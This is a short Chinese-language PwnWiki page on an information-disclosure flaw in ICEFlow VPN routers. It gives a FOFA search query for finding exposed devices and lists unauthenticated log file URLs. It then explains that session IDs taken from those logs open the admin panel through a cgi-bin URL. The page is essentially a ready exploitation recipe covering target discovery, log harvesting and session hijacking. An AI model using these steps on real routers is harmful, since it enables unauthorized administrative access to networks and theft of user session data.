ICEFlow VPN 信息洩露漏洞

From PwnWiki
Revision as of 17:04, 7 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="ICEFLOW VPN Router" </pre> ==漏洞利用== 可訪問的日誌 Url <pre> 系統日誌 http://url/log/system.log VPN日誌 http://url/log/vpn.log 訪問...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

title="ICEFLOW VPN Router"


漏洞利用

可訪問的日誌 Url 

系統日誌 http://url/log/system.log
VPN日誌 http://url/log/vpn.log
訪問日誌 http://url/log/access.log
告警日誌 http://url/log/warn.log
錯誤日誌 http://url/log/error.log
調試日誌 http://url/log1/debug.log
移動用戶日誌 http://url/log/mobile.log
防火牆日誌 http://url/log/firewall.log

根據日誌信息獲得session後,可利用實時登錄系統管理後台: 

http://xxx.xxx.xxx.xxx/cgi-bin/index?oid=10&session_id=xxxxxxxxxxxxxx&l=0
Retrieved from "https://pwnwiki.com/index.php?title=ICEFlow_VPN_信息洩露漏洞&oldid=2716"